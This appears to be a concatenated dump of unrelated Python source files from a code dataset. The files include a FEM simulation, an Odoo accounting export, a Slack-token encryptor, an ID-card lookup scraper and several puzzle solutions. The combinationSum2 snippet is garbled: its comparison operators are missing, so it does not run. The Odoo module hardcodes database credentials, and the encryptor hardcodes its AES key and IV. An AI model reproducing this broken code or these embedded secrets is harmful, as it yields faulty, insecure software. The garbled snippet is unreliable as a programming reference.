boundaries, 1)]\n\n\nfor t_idx in range(num_tsteps):\n\n    print(\"Time step {} of {}\".format(t_idx, num_tsteps))\n    phi = df.Function(V)\n    A = df.assemble(a)\n    b = df.assemble(L)\n\n    [bc.apply(A, b) for bc in bcs]\n\n    # Adding point sources from neural simulation\n    for s_idx, s_pos in enumerate(source_pos):\n\n        point = df.Point(s_pos[0], s_pos[1], s_pos[2])\n        delta = df.PointSource(V, point, imem[s_idx, t_idx])\n        delta.apply(b)\n\n    df.solve(A, phi.vector(), b, 'cg', \"ilu\")\n\n    # df.File(join(out_folder, \"phi_t_vec_{}.xml\".format(t_idx))) << phi\n    np.save(join(out_folder, \"phi_t_vec_{}.npy\".format(t_idx)), phi.vector())\n\n    plot_FEM_results(phi, t_idx)\n\n\n","sub_path":"axon_tunnel_FEM_control_simulation.py","file_name":"axon_tunnel_FEM_control_simulation.py","file_ext":"py","file_size_in_byte":7240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"246128381","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n    Setup file for PyScaffold.\n\n    Important note: Since PyScaffold is self-using and depends on\n    setuptools-scm, it is important to run `python setup.py egg_info` after\n    a fresh checkout.
 This will generate some critically needed data.\n\"\"\"\n\nimport inspect\nimport os\nimport sys\n\nfrom setuptools import setup\n\n__author__ = \"Florian Wilhelm\"\n__copyright__ = \"Blue Yonder\"\n__license__ = \"new BSD\"\n__location__ = os.path.join(os.getcwd(), os.path.dirname(\n    inspect.getfile(inspect.currentframe())))\n\n\ndef setup_package():\n    needs_sphinx = {'build_sphinx', 'upload_docs'}.intersection(sys.argv)\n    sphinx = ['sphinx'] if needs_sphinx else []\n    setup(setup_requires=['six', 'pyscaffold>=2.5a0,<2.6a0'] + sphinx,\n          use_pyscaffold=True)\n\n\nif __name__ == '__main__':\n    setup_package()\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"269765909","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport optparse\nimport os\nimport sys\nimport subprocess\n\nimport time\n\ntry:\n    # We don't actually need typing, but it's a good guard for being\n    # outside a Zulip virtualenv.\n    from typing import Iterable\n    import requests\nexcept ImportError as e:\n    print(\"ImportError: {}\".format(e))\n    print(\"You need to run the Zulip tests inside a Zulip dev environment.\")\n    print(\"If you are using Vagrant, you can `vagrant ssh` to enter the Vagrant guest.\")\n    sys.exit(1)\n\nos.environ[\"EXTERNAL_HOST\"] = \"localhost:9981\"\n\nparser = optparse.OptionParser()\nparser.add_option('--force', default=False,\n                  action=\"store_true\",\n                  help='Run tests despite possible problems.')\n(options, args) = parser.parse_args()\n\ndef assert_server_running(server):\n    # type: (subprocess.Popen) -> None\n    \"\"\"Raise a RuntimeError if the server process has died.\"\"\"\n    if server.poll() is not None:\n        raise RuntimeError('Server died unexpectedly!
 Check %s' % (LOG_FILE,))\n\n\ndef server_is_up(server):\n    # type: (subprocess.Popen) -> bool\n    assert_server_running(server)\n    try:\n        # We could get a 501 error if the reverse proxy is up but the Django app isn't.\n        return requests.get('http://127.0.0.1:9981/accounts/home').status_code == 200\n    except Exception:\n        return False\n\n\nsubprocess.check_call(['mkdir', '-p', 'var/help-documentation'])\n\nLOG_FILE = 'var/help-documentation/server.log'\nif os.path.exists(LOG_FILE) and os.path.getsize(LOG_FILE) < 100000:\n    log = open(LOG_FILE, 'a')\n    log.write('\\n\\n')\nelse:\n    log = open(LOG_FILE, 'w')\n\nrun_dev_server_command = ['tools/run-dev.py', '--test']\nif options.force:\n    run_dev_server_command.append('--force')\nserver = subprocess.Popen(run_dev_server_command, stdout=log, stderr=log)\n\nsys.stdout.write('Waiting for test server')\ntry:\n    while not server_is_up(server):\n        sys.stdout.write('.')\n        sys.stdout.flush()\n        time.sleep(0.1)\n    sys.stdout.write('\\n')\n\n    ret = subprocess.call(('scrapy', 'crawl_with_status', 'help_documentation_crawler'),\n                          cwd='tools/documentation_crawler')\nfinally:\n    assert_server_running(server)\n    server.terminate()\n\nif ret != 0:\n    print(\"\\033[0;91m\")\n    print(\"Failed\")\n    print(\"\\033[0m\")\nelse:\n    print(\"\\033[0;92m\")\n    print(\"Passed!\")\n    print(\"\\033[0m\")\n\n\nsys.exit(ret)\n","sub_path":"tools/test-help-documentation.py","file_name":"test-help-documentation.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"523044164","text":"# Example:\n# If Old Mr. Wang sees 5 heads and 14 legs,\n# then there are 3 chickens and 2 rabbits.\n# If the counts he sees have no solution, print \"NO\"\n\nnm = input().split()\nn = int(nm[0])\nm = int(nm[1])\n\nif (m % 2 == 0) and (n * 2 <= m) and (n * 4 >= m):\n\n    print(\"YES\")\n\n    r = int((m - (n * 2)) / 2)\n    c = n - r\n    print(c, r)\n\nelse:\n    print(\"NO\")","sub_path":"1201-雞兔同籠.py","file_name":"1201-雞兔同籠.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"356763047","text":"# -*- coding: utf-8 -*-\nfrom openerp import models, fields, api\n\nfrom pyimppn import imppn_line\nimport psycopg2\nimport os\n\nclass company_imppn(models.Model):\n    _inherit = 'res.company'\n\n    x_teamsystem_id = fields.Integer(string='Teamsystem id')\n\n\nclass odoo_imppn(models.Model):\n    _name = 'odoo_imppn.odoo_imppn'\n    # name = fields.Char(required=True,default='Click on button!')\n\n    @api.multi\n    def test_text_file(self):\n        results = \"this is a test to see if we are able to write to a text file located inside the module\\n\"\n        path = os.path.expanduser('./etc/odoo/addons/odoo_imppn/IMPPN.txt')\n        # fileIMPPN = open(os.path.join(os.path.dirname(__file__), 'IMPPN.txt'), 'r+')\n        fileIMPPN = open(path, 'a')\n        fileIMPPN.write(results)\n        fileIMPPN.close()\n\n    @api.multi\n    def select_form_account_invoice(self):\n        postgresql = \"SELECT res_company.x_teamsystem_id, res_partner.name FROM res_company, account_invoice, res_partner \" \\\n                     \" WHERE res_partner.id = account_invoice.partner_id AND res_company.id = 1 ;\"\n        cnx = None\n        try:\n            # Connect to the PostgreSQL database\n            cnx = psycopg2.connect(host=\"172.17.0.2\", port=5432, user=\"odoo\", password=\"odoo\", dbname=\"db\")\n            # Creating a cursor object to interact with the PostgreSQL db and assign it to a variable cursor\n            cur = cnx.cursor()\n            # Execute statement or query on db\n            cur.execute(postgresql)\n            # Fetch all rows of the query executed\n            results = cur.fetchall()\n            # close communication 
with the database\n cur.close()\n return results\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if cnx is not None:\n cnx.close()\n \n @api.multi\n def import_accounting(self):\n result = self.select_form_account_invoice()\n for i in range(len(result)):\n result_string = imppn_line(\n TRF_DITTA=str(result[i][0]),\n TRF_VERSIONE=\"3\",\n TRF_TARC=\"0\",\n TRF_COD_CLIFOR=\"\",\n TRF_RASO=str(result[i][1]),\n TRF_IND=\"Via Roma, 44\",\n TRF_CAP=\"19100\",\n TRF_CITTA=\"La Spezia\",\n TRF_PROV=\"SP\",\n TRF_COFI=\"\",\n TRF_PIVA=\"00468990015\",\n TRF_PF=\"N\",\n TRF_DIVIDE=\"\",\n TRF_PAESE=\"\",\n TRF_PIVA_ESTERO=\"\",\n TRF_COFI_ESTERO=\"\",\n TRF_SESSO=\"\",\n TRF_DTNAS=\"\",\n TRF_COMNA=\"\",\n TRF_PRVNA=\"\",\n TRF_PREF=\"\",\n TRF_NTELE_NUM=\"\",\n TRF_FAX_PREF=\"\",\n TRF_FAX_NUM=\"\",\n TRF_CFCONTO=\"\",\n TRF_CFCODPAG=\"\",\n TRF_CFBANCA=\"\",\n TRF_CFAGENZIA=\"\",\n TRF_CFINTERM=\"\",\n TRF_CAUSALE=\"001\",\n TRF_CAU_DES=\"Causale\",\n TRF_CAU_AGG=\"di prova\",\n TRF_CAU_AGG_1=\"\",\n TRF_CAU_AGG_2=\"\",\n TRF_DATA_REGISTRAZIONE=\"15012016\",\n TRF_DATA_DOC=\"15012016\",\n TRF_NUM_DOC_FOR=\"\",\n TRF_NDOC=\"12\",\n TRF_SERIE=\"\",\n TRF_EC_PARTITA=\"\",\n TRF_EC_PARTITA_ANNO=\"\",\n TRF_EC_COD_VAL=\"\",\n TRF_EC_CAMBIO=\"\",\n TRF_EC_DATA_CAMBIO=\"\",\n TRF_EC_TOT_DOC_VAL=\"\",\n TRF_EC_TOT_IVA_VAL=\"\",\n TRF_PLAFOND=\"\",\n TRF_IMPONIB=\"100000\",\n TRF_ALIQ=\"22\",\n TRF_ALIQ_AGRICOLA=\"\",\n TRF_IVA11=\"\",\n TRF_IMPOSTA=\"22000\",\n TRF_IMPONIB2=\"\",\n TRF_ALIQ2=\"\",\n TRF_ALIQ_AGRICOLA2=\"\",\n TRF_IVA112=\"\",\n TRF_IMPOSTA2=\"\",\n TRF_IMPONIB3=\"\",\n TRF_ALIQ3=\"\",\n TRF_ALIQ_AGRICOLA3=\"\",\n TRF_IVA113=\"\",\n TRF_IMPOSTA3=\"\",\n TRF_IMPONIB4=\"\",\n TRF_ALIQ24=\"\",\n TRF_ALIQ_AGRICOLA4=\"\",\n TRF_IVA114=\"\",\n TRF_IMPOSTA4=\"\",\n TRF_IMPONIB5=\"\",\n TRF_ALIQ5=\"\",\n TRF_ALIQ_AGRICOLA5=\"\",\n TRF_IVA115=\"\",\n TRF_IMPOSTA5=\"\",\n TRF_IMPONIB6=\"\",\n TRF_ALIQ6=\"\",\n TRF_ALIQ_AGRICOLA6=\"\",\n TRF_IVA116=\"\",\n TRF_IMPOSTA6=\"\",\n TRF_IMPONIB7=\"\",\n TRF_ALIQ7=\"\",\n TRF_ALIQ_AGRICOLA7=\"\",\n TRF_IVA117=\"\",\n TRF_IMPOSTA7=\"\",\n TRF_IMPONIB8=\"\",\n TRF_ALIQ8=\"\",\n TRF_ALIQ_AGRICOLA8=\"\",\n TRF_IVA118=\"\",\n TRF_IMPOSTA8=\"\",\n TRF_TOT_FATT=\"122000\",\n TRF_CONTO_RIC=\"5805507\",\n TRF_IMP_RIC=\"100000\",\n TRF_CAU_PAGAM=\"\",\n TRF_CAU_DES_PAGAM=\"\",\n TRF_CAU_AGG_1_PAGAM=\"\",\n TRF_CAU_AGG_2_PAGAM=\"\",\n TRF_CONTO=\"\",\n TRF_DA=\"\",\n TRF_IMPORTO=\"\",\n TRF_CAU_AGGIUNT=\"\",\n TRF_EC_PARTITA_PAG=\"\",\n TRF_EC_PARTITA_ANNO_PAG=\"\",\n TRF_EC_IMP_VAL=\"\",\n TRF_RIFER_TAB=\"\",\n TRF_IND_RIGA=\"\",\n TRF_DT_INI=\"\",\n TRF_DT_FIN=\"\",\n TRF_DOC6=\"\",\n TRF_AN_OMONIMI=\"\",\n TRF_AN_TIPO_SOGG=\"\",\n TRF_EC_PARTITA_SEZ_PAG=\"\",\n TRF_NUM_DOC_PAG_PROF=\"\",\n TRF_DATA_DOC_PAG_PROF=\"\",\n TRF_RIT_ACC=\"\",\n TRF_RIT_PREV=\"\",\n TRF_RIT_1=\"\",\n TRF_RIT_2=\"\",\n TRF_RIT_3=\"\",\n TRF_RIT_4=\"\",\n TRF_UNITA_RICAVI=\"\",\n TRF_UNITA_PAGAM=\"\",\n TRF_FAX_PREF_1=\"\",\n TRF_FAX_NUM_1=\"\",\n TRF_SOLO_CLIFOR=\"\",\n TRF_80_SEGUENTE=\"\",\n TRF_CONTO_RIT_ACC=\"\",\n TRF_CONTO_RIT_PREV=\"\",\n TRF_CONTO_RIT_1=\"\",\n TRF_CONTO_RIT_2=\"\",\n TRF_CONTO_RIT_3=\"\",\n TRF_CONTO_RIT_4=\"\",\n TRF_DIFFERIMENTO_IVA=\"\",\n TRF_STORICO=\"\",\n TRF_STORICO_DATA=\"\",\n TRF_CAUS_ORI=\"\",\n TRF_PREV_TIPOMOV=\"\",\n TRF_PREV_RATRIS=\"\",\n TRF_PREV_DTCOMP_INI=\"\",\n TRF_PREV_DTCOMP_FIN=\"\",\n TRF_PREV_FLAG_CONT=\"\",\n TRF_RIFERIMENTO=\"\",\n TRF_CAUS_PREST_ANA=\"\",\n TRF_EC_TIPO_PAGA=\"\",\n 
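# The remaining TRF_* fields of this fixed-record layout are intentionally left blank in this example.\n                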
TRF_CONTO_IVA_VEN_ACQ=\"\",\n TRF_PIVA_VECCHIA=\"\",\n TRF_PIVA_ESTERO_VECCHIA=\"\",\n TRF_RISERVATO=\"\",\n TRF_DATA_IVA_AGVIAGGI=\"\",\n TRF_DATI_AGG_ANA_REC4=\"\",\n TRF_RIF_IVA_NOTE_CRED=\"\",\n TRF_RIF_IVA_ANNO_PREC=\"\",\n TRF_NATURA_GIURIDICA=\"\",\n TRF_STAMPA_ELENCO=\"\",\n TRF_PERC_FORF=\"\",\n TRF_SOLO_MOV_IVA=\"\",\n TRF_COFI_VECCHIO=\"\",\n TRF_USA_PIVA_VECCHIA=\"\",\n TRF_USA_PIVA_EST_VECCHIA=\"\",\n TRF_USA_COFI_VECCHIO=\"\",\n TRF_ESIGIBILITA_IVA=\"\",\n TRF_TIPO_MOV_RISCONTI=\"\",\n TRF_AGGIORNA_EC=\"\",\n TRF_BLACKLIST_ANAG=\"\",\n TRF_BLACKLIST_IVA=\"\",\n TRF_BLACKLIST_IVA_ANA=\"\",\n TRF_CONTEA_ESTERO=\"\",\n TRF_ART21_ANAG=\"\",\n TRF_ART21_IVA=\"\",\n TRF_RIF_FATTURA=\"\",\n TRF_RISERVATO_B=\"\"\n )\n path = os.path.expanduser('./etc/odoo/addons/odoo_imppn/IMPPN.txt')\n fileIMPPN = open(path, 'r+')\n fileIMPPN.write(result_string.rstrip('\\r\\n'))\n fileIMPPN.close()\n","sub_path":"models/odoo_imppn.py","file_name":"odoo_imppn.py","file_ext":"py","file_size_in_byte":8210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"206139210","text":"from __future__ import print_function, unicode_literals\nimport base64\nimport sys\nimport pyaes.aes\n\nif sys.version_info < (3, 0):\n prompt = raw_input\nelse:\n prompt = input\n\nkey = 'unfoldingWord.org_door43.org_ufw'\niv = 'unfoldingWord_43'\n\n\ndef encrypt_slack_token(token):\n global key, iv\n\n aes = pyaes.AESModeOfOperationOFB(key, iv=iv)\n encrypted_text = aes.encrypt(token)\n return base64.b64encode(encrypted_text)\n\n\ndef decrypt_slack_token(encrypted_token):\n global key, iv\n\n aes = pyaes.AESModeOfOperationOFB(key, iv=iv)\n return aes.decrypt(base64.b64decode(encrypted_token))\n\n\nif __name__ == '__main__':\n\n # initialization\n plain_text = prompt('Enter the string to encrypt: ')\n\n # encrypt the string and display\n b64 = encrypt_slack_token(plain_text)\n print()\n print('Encrypted text: {0}'.format(b64))\n\n # test decrypting and display the result\n plain_text = decrypt_slack_token(b64)\n print()\n print('Decrypted text: {0}'.format(plain_text))\n","sub_path":"functions/invite/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"472714236","text":"import os\r\nimport sys\r\n\r\nfrom utils import *\r\nfrom utils import _make_path_relative\r\nimport osconfig\r\n\r\nmakefile = '''phony := all\r\nall:\r\n\r\ninclude config.mk\r\n\r\nifneq ($(MAKE_LIB),1)\r\nTARGET := oneos.elf\r\ninclude src.mk\r\nendif\r\n\r\n$(if $(strip $(OS_ROOT)),,$(error OS_ROOT not defined))\r\n\r\ninclude $(OS_ROOT)/scripts/oneos.mk\r\n'''\r\n\r\ndef TargetMakefile(env):\r\n project = ProjectInfo(env)\r\n\r\n BSP_ROOT = os.path.abspath(env['BSP_ROOT'])\r\n OS_ROOT = os.path.abspath(env['OS_ROOT'])\r\n\r\n match_bsp = False\r\n if BSP_ROOT.startswith(OS_ROOT): \r\n match_bsp = True\r\n\r\n make = open('config.mk', 'w')\r\n\r\n make.write('BSP_ROOT ?= %s\\n' % BSP_ROOT.replace('\\\\', '/'))\r\n make.write('OS_ROOT ?= %s\\n' % OS_ROOT.replace('\\\\', '/'))\r\n make.write('\\n')\r\n\r\n cross = os.path.abspath(osconfig.COMPILER_PATH)\r\n cross = os.path.join(cross, osconfig.PREFIX)\r\n make.write('CROSS_COMPILE ?=%s' % cross.replace('\\\\', '\\\\\\\\'))\r\n make.write('\\n')\r\n make.write('\\n')\r\n\r\n make.write('CFLAGS :=%s' % (osconfig.CFLAGS))\r\n make.write('\\n')\r\n make.write('AFLAGS :=%s' % (osconfig.AFLAGS))\r\n make.write('\\n')\r\n 
    make.write('LFLAGS :=%s' % (osconfig.LFLAGS))\r\n    make.write('\\n')\r\n    if 'CXXFLAGS' in dir(osconfig):\r\n        make.write('CXXFLAGS :=%s' % (osconfig.CXXFLAGS))\r\n        make.write('\\n')\r\n\r\n    make.write('\\n')\r\n    make.close()\r\n\r\n    Files = project['FILES']\r\n    Headers = project['HEADERS']\r\n    CPPDEFINES = project['CPPDEFINES']\r\n\r\n    paths = [os.path.normpath(i) for i in project['CPPPATH']]\r\n    CPPPATH = []\r\n    for path in paths:\r\n        fn = os.path.normpath(path)\r\n        if match_bsp:\r\n            if fn.startswith(BSP_ROOT):\r\n                fn = '$(BSP_ROOT)' + fn.replace(BSP_ROOT, '')\r\n            elif fn.startswith(OS_ROOT):\r\n                fn = '$(OS_ROOT)' + fn.replace(OS_ROOT, '')\r\n        else:\r\n            if fn.startswith(OS_ROOT):\r\n                fn = '$(OS_ROOT)' + fn.replace(OS_ROOT, '')\r\n            elif fn.startswith(BSP_ROOT):\r\n                fn = '$(BSP_ROOT)' + fn.replace(BSP_ROOT, '')\r\n\r\n        CPPPATH.append(fn)\r\n\r\n    path = ''\r\n    paths = CPPPATH\r\n    for item in paths:\r\n        path += '\\t-I%s \\\\\\n' % item\r\n\r\n    make.write('CPPPATHS :=')\r\n    if path[0] == '\\t': path = path[1:]\r\n    length = len(path)\r\n    if path[length - 2] == '\\\\': path = path[:length - 2]\r\n    make.write(path)\r\n    make.write('\\n')\r\n    make.write('\\n')\r\n\r\n    defines = ''\r\n    for item in project['CPPDEFINES']:\r\n        defines += ' -D%s' % item\r\n    make.write('DEFINES :=')\r\n    make.write(defines)\r\n    make.write('\\n')\r\n\r\n    files = Files\r\n    Files = []\r\n    for file in files:\r\n        fn = os.path.normpath(file)\r\n        if match_bsp:\r\n            if fn.startswith(BSP_ROOT):\r\n                fn = '$(BSP_ROOT)' + fn.replace(BSP_ROOT, '')\r\n            elif fn.startswith(OS_ROOT):\r\n                fn = '$(OS_ROOT)' + fn.replace(OS_ROOT, '')\r\n        else:\r\n            if fn.startswith(OS_ROOT):\r\n                fn = '$(OS_ROOT)' + fn.replace(OS_ROOT, '')\r\n            elif fn.startswith(BSP_ROOT):\r\n                fn = '$(BSP_ROOT)' + fn.replace(BSP_ROOT, '')\r\n\r\n        Files.append(fn)\r\n        # print(fn)\r\n\r\n    src = open('src.mk', 'w')\r\n    files = Files\r\n    src.write('SRC_FILES :=\\n')\r\n    for item in files:\r\n        src.write('SRC_FILES +=%s\\n' % item.replace('\\\\', '/'))\r\n    src.close()\r\n\r\n    make = open('Makefile', 'w')\r\n    make.write(makefile)\r\n    make.close()\r\n\r\n    return\r\n","sub_path":"scripts/makefile.py","file_name":"makefile.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"129788944","text":"# coding: utf-8\nfrom scrapy.selector import Selector\n\nfrom app.spider.base import Spider\nfrom app.utils.id_card import IdCardParser\n\n\nclass IP138Spider(Spider):\n    query_url = \"http://qq.ip138.com/idsearch/index.asp\"\n\n    use_new_native_place = False  # some native-place records carry both an old and a new name; return the new one when True\n\n    async def query(self, idCard, **kwargs):\n        parser = IdCardParser(idCard)\n        if parser.native_place:\n            return {\"nativePlace\": parser.native_place}\n\n        async with self.aio_session:\n            payload = {\n                \"action\": \"idcard\",\n                \"userid\": f\"{idCard[:6]}197001010000\",\n                \"B1\": \"查+询\",\n            }\n\n            text = await self.fetch(url=self.query_url, params=payload, return_type=str)\n\n        selector = Selector(text=text)\n        native_place_list = selector.css('.tdc2::text').extract()[2:]\n\n        if native_place_list:\n            native_place = native_place_list[-1] if self.use_new_native_place else native_place_list[0]\n            return {\"nativePlace\": native_place.strip()}\n\n        return {\"nativePlace\": \"\"}\n","sub_path":"app/spider/deadbeat/ip138/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"262113477","text":"class solution:\n
\n    def combinationSum2(self, candidates, target):\n        # the comparison operators in this snippet were lost during extraction;\n        # the guard and the loop bounds below are a minimal reconstruction of\n        # the visible knapsack-style backward scan\n        nums = sorted(candidates)\n        ssum = sum(nums)\n        if (ssum < target):\n            return []\n        # dp[j] collects the remainders j - nums[i] reachable at sum j\n        dp = [[] for _ in range(target + 1)]\n        for i in range(len(nums)):\n            j = target\n            while (j >= nums[i]):\n                dp[j].append(j - nums[i])\n                j -= 1\n        return dp[-1]\n\nnums = [10,1,2,7,6,1,5]\ntarget = 8\n\nprint(solution().combinationSum2(nums, target))","sub_path":"python/combinationSum2.py","file_name":"combinationSum2.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"632233474","text":"##=================================================\n# @Author : NgTuong\n# File : utils.py\n# Time : 24/09/2019\n# Description : Load dataset using hdf5 file\n##==================================================\n\nimport numpy as np\nimport h5py\n\ndef load_dataset():\n    dataset = h5py.File(\"cat_and_dog.hdf5\", 'r')\n\n    train_set = np.array(dataset[\"train_img\"][:])\n    train_labels = np.array(dataset[\"train_labels\"][:])\n    train_labels = train_labels.reshape((1, train_labels.shape[0]))\n\n    test_set = np.array(dataset[\"test_img\"][:])\n    test_labels = np.array(dataset[\"test_labels\"][:])\n    test_labels = test_labels.reshape((1, test_labels.shape[0]))\n\n    return train_set, train_labels[0], test_set, test_labels[0]","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"49212156","text":"\"\"\"IRC Stuff\"\"\"\nimport core\nPLUGINVERSION = 2\n# Always name this variable as `plugin`\n# If you don't, the module loader will fail to load the plugin!\nplugin = core.Plugin()\n@plugin.command(command=\"/me\",\n                description=\"/me from IRC\",\n                inline_supported=True,\n                hidden=False)\ndef me(bot, update, user, args):\n    args = \" \".join(update.message.text.split(\" \")[1:])\n    return core.message(text=\"* %s %s\" % (user.username, args))\n","sub_path":"me.py","file_name":"me.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"198981303","text":"# def updateMatrix(self, matrix):\n\n# matrix = [[0,0,0], [0,1,0], [0,0,0]]\nmatrix = [[0,0,0], [0,1,0], [1,1,1]]\n\nn, m = len(matrix),len(matrix[0])\ndp = [[float('Inf')] * m for _ in range(n)]\n\n# forward pass from the top-left, taking minimums\nfor i in range(n):\n    for j in range(m):\n        if matrix[i][j] == 0:\n            dp[i][j] = 0\n        else:\n            if i > 0:\n                dp[i][j] = min(dp[i][j], dp[i-1][j]+1)\n            if j > 0:\n                dp[i][j] = min(dp[i][j], dp[i][j-1]+1)\n\n# backward pass from the bottom-right, taking minimums\n# with only the first pass this returned [[0, 0, 0], [0, 1, 0], [inf, inf, inf]]\nfor i in range(n-1, -1, -1):\n    for j in range(m-1, -1, -1):\n        if matrix[i][j] == 0:\n            dp[i][j] = 0\n        else:\n            if i < n-1:\n                dp[i][j] = min(dp[i][j], dp[i+1][j]+1)\n            if j < m-1:\n                dp[i][j] = min(dp[i][j], dp[i][j+1]+1)\n\nprint(dp)","sub_path":"1월 2주차/[LEETCODE] 01 Matrix.py","file_name":"[LEETCODE] 01 Matrix.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"82741261","text":"from odoo import models, fields, api\nfrom odoo.exceptions import ValidationError, UserError\n\n\nclass Pagar_letras_wizard(models.TransientModel):\n    _name = 'pagar_letras_wizard'\n    _description = \"Pagar letras\"\n\n\n    def _get_letras(self):\n        if self.env.context and self.env.context.get('active_ids'):\n            return self.env.context.get('active_ids')\n        return []\n\n\n    letra_ids = fields.Many2many('letra_cambio.letra', default=_get_letras, string='Letras')\n\n    currency_id = fields.Many2one('res.currency', string='Moneda')
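\n    # note: fields.Monetary resolves its currency through the currency_field\n    # argument, which defaults to 'currency_id', so the Many2one above is what\n    # gives the amount below its currency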
\n    gastos = fields.Monetary(string='Gastos por cobranza libre')\n\n    @api.multi\n    def pagar_letras(self):\n        active_ids = self.env.context.get('active_ids', []) or []\n        records = self.env['letra_cambio.letra'].browse(active_ids)\n\n        self.env['letra_cambio.letra'].cambiar_estado_all_gastos(records, \"PAG\", self.gastos)\n","sub_path":"addons/letra_cambio/wizard/pagar_letras_wizard.py","file_name":"pagar_letras_wizard.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"384936027","text":"import os\nimport shutil\nimport subprocess\nimport numpy as np\n\nfrom helpers import SpikeGLX_utils\nfrom helpers import log_from_json\nfrom create_input_json import createInputJson\n\n# script to run CatGT, KS2, postprocessing and TPrime on data collected using\n# SpikeGLX. The construction of the paths assumes data was saved with\n# \"Folder per probe\" selected (probes stored in separate folders) AND\n# that CatGT is run with the -out_prb_fld option\n\n# -----------\n# Input data\n# -----------\n# Name for log file for this pipeline run. Log file will be saved in the\n# output destination directory catGT_dest\nlogName = 'dl56_20181126_log.csv'\n\n# Raw data directory = npx_directory, all runs to be processed are in\n# subfolders of this folder\nnpx_directory = r'D:\\ecephys_fork\\test_data\\3A_DL'\n\n# run_specs = name, gate, trigger and probes to process\n# Each run_spec is a list:\n# (string) animal name = undecorated run name, e.g. 'dl56',\n# (string) date of recording, as yyyymmdd, e.g. '20181126'\n# (string) gate index, as a string (e.g. '0')\n# (string) triggers to process/concatenate, as a string e.g. '0,400', '0,0', \n# can replace first limit with 'start', last with 'end'; 'start,end'\n# will concatenate all trials in the probe folder\n# (list of strings) computer/ probe labels to process, as a list, e.g. ['ww2','ww4']\n# (list of ints) SY channel for each run -- if no SY channel, or not extracting that data, enter None\n#\n# The assumed file structure for input is:\n# /probe(computer) label/animal name/date/*.bin files\n# Note that both the folder name and run name = animal name\n# Does not use SpikeGLX generated run folders\n\nrun_specs = [\n\t\t\t\t\t['dl56', '20181126', '0', 'start,end', ['ww2','ww4'], [384,384]]\n]\n\n\n\n# ------------------\n# Output destination\n# ------------------\n# Set to an existing directory; all output will be written here, in\n# subfolders named animal name_date\ncatGT_dest_parent = r'D:\\ecephys_fork\\test_data\\3A_DL\\DL56'\n\n# ------------\n# CatGT params\n# ------------\nrun_CatGT = True # set to False to sort/process previously processed data.\n# catGT streams to process, e.g. just '-ap' for ap band only, '-ap -ni' for\n# ap plus ni aux inputs\ncatGT_stream_string = '-prb_3A -ap -no_run_fld -t_miss_ok'\n\n# CatGT command string includes all instructions for catGT operations\n# see CatGT readme for details\n# 3A specific details:
\n# - no automatically generated run folders: assume the user has grouped the data\n#   from the probes into one folder, named in the run_spec\n# - no probe folders -- each call to catGT processes one probe's data\n#   - the extraction parameters (bit, length in msec) are assumed to be the same for all probes\n#   - the correct channel for the extraction is specified in run_spec[4]\ncatGT_cmd_string = '-aphipass=300 -aplopass=9000 -gbldmx -gfix=0,0.10,0.02'\n\n# for each desired extraction from the SY channel, specify:\n# bit, span in msec, and tolerance in ms, or -1 to use the default\n# tolerance of 20% of span\n# the extraction strings for catGT will be built for each probe\nsy_ex_param_list = list()\nsy_ex_param_list.append([0, 0, -1])\nsy_ex_param_list.append([1, 50, -1])\nsy_ex_param_list.append([1, 10, -1])\nsy_ex_param_list.append([1, 1200, 0.2])\n\n# ----------------------\n# psth_events parameters\n# ----------------------\n# extract param string for psth events -- copy the CatGT params used to extract\n# events that should be exported with the phy output for PSTH plots\n# With 3A, it is assumed that the same extraction parameters will be used for\n# all probes, and the index is specified here\n# If not using, remove psth_events from the list of modules\nevent_ex_param_index = 1\n\n# -----------------\n# TPrime parameters\n# -----------------\nrunTPrime = True # set to False if not using TPrime\nsync_period = 12.0 # period of the SYNC wave; in 3A this uses the trial TTL signal\nsync_param = [0, 0, -1] # SYNC bit and msec duration of SYNC signal\n\n# ---------------\n# Modules List\n# ---------------\n# List of modules to run per probe; \n# CatGT is handled separately; TPrime is called once for each run.\nmodules = [\n\t\t\t'kilosort_helper',\n            'kilosort_postprocessing',\n            'noise_templates',\n            #'psth_events',\n            'mean_waveforms',\n            'quality_metrics'\n\t\t\t]\n\njson_directory = r'D:\\ecephys_fork\\json_files'\n\n\n# delete the existing CatGT.log\ntry:\n    os.remove('CatGT.log')\nexcept OSError:\n    pass\n\n# delete existing Tprime.log\ntry:\n    os.remove('Tprime.log')\nexcept OSError:\n    pass\n\n# delete existing C_waves.log\ntry:\n    os.remove('C_Waves.log')\nexcept OSError:\n    pass\n\n# delete any existing log with the current name\nlogFullPath = os.path.join(catGT_dest_parent, logName)\ntry:\n    os.remove(logFullPath)\nexcept OSError:\n    pass\n\n# create the log file, write 